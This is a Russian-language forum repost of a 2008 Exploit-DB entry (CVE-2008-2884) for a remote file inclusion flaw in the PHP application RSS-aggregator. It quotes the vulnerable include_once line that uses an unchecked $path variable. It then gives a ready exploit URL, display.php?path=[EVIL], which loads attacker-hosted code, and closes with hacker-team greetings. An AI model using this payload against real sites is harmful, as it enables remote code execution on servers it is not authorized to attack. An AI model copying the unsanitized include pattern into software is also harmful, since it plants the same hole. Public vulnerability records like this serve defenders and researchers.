Exploit RSS-aggregator - 'path' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5900
Проверка EDB
  1. Пройдено
Автор
GHOST HACKER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-2884
Дата публикации
2008-06-22
Код:
##############################################################
 RSS-aggregator (display) Remote File Inclusion Vulnerability
##############################################################
[~] Found : Ghost Hacker [ R-H TeaM ]
[~] HOME  : www.Real-Hack.net
[~] Email : [email protected]
[~] Script : RSS-aggregator
[~] Download Script : http://www.rss-aggregator.com/download.php
=========================== [ Viva IslaM ] ==========================
Error ( display.PHP ) :
include_once($path.'/admin/fonctions/config.php');

Exploit :
http://xxxx/[Path]/display.php?path=[EVIL]
=========================== [ Viva IslaM ] ==========================
[~] Gootz :
PROTO & QaTaR BoeZ TeaM & v4 TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & Jiko & Mr.JUVE
Mr.hope & Mr.MoSoS & x.CJP.x & Dr.Shares & eLe$ & MR.SQL & QaT HaCkEr ..
All Member Real Hack And All My Friends ..
##############################################################
 Found By Ghost Hacker & My TeaM R-H
##############################################################

# milw0rm.com [2008-06-22]
 
Источник
www.exploit-db.com

Похожие темы